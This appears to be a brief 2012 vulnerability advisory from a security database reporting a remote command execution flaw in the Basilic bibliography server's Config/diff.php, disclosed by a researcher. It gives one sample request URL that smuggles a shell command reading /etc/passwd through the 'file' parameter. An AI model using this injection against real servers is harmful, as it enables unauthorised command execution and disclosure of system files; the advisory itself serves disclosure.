Basilic RCE bug

2012-07-09T00:00:00
ID SECURITYVULNS:DOC:28256
Type securityvulns
Reporter Securityvulns
Modified 2012-07-09T00:00:00

Description

Hi Dear Sir

Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center. there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server. sample: http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Regards M.Razavi